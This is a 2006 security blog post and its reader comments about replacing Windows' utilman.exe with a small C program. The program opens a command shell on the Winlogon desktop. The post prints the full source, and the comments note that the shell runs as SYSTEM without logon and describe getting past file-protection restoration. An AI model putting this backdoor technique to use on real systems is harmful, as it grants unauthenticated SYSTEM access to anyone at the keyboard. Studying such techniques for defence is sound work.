Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
#include <stdio.h>
#include <windows.h>
#include <tchar.h>
void _tmain(void)
{
STARTUPINFO s;
PROCESS_INFORMATION p;
LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon"));
ZeroMemory(&s, sizeof(s));
s.cb = sizeof(s);
s.lpDesktop = szDesktop;
ZeroMemory(&p, sizeof(p));
CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);
CloseHandle(p.hProcess);
CloseHandle(p.hThread);
}
Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.
What user account does the shell run as? If it is system then their is a huge security hole.
Comment by Jay — Friday 1 September 2006 @ 14:14
It’s the SYSTEM account, read this: http://didierstevens.wordpress.com/2006/08/21/playing-with-utilmanexe/
Comment by Didier Stevens — Friday 1 September 2006 @ 16:28
It doesn’t matter on which desktop the cmd runs.
utilman.exe always runs as SYSTEM.
Nice man
Comment by evilbitz — Friday 1 September 2006 @ 20:00
[...] For a demo of My second playdate with utilman.exe, go here on YouTube. [...]
Pingback by Playing with utilman.exe, The Motion Picture « Didier Stevens — Tuesday 5 September 2006 @ 10:00
Hi, i compile you’re script with no error, replace in dllcache and system32, block sfc when prompt to restore, but when i press “Windows key” + U, nothing, you’re script in the 3 exemple work, but not the last with CMD.
Comment by Jacky — Wednesday 16 April 2008 @ 13:56